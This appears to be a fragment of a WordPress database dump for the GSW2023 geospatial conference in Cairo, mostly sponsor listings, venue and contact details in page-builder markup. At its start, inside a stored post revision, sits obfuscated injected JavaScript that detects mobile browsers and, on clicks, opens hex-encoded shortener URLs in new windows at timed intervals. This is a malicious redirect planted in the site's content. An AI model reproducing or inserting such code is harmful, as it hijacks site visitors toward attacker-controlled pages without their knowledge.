_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Flamenco Cairo Hotel','','inherit','closed','closed','','4725-revision-v1','','','2023-08-15 17:03:13','2023-08-15 17:03:13','',4725,'https://gsw2023.com/?p=5205',0,'revision','',0),
(5206,1,'2023-08-15 17:08:13','2023-08-15 17:08:13','<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\r\n[vc_separator style=\"shadow\" border_width=\"10\"]\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 145px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 160px !important;}\"]\r\n\r\n<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>                    Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" 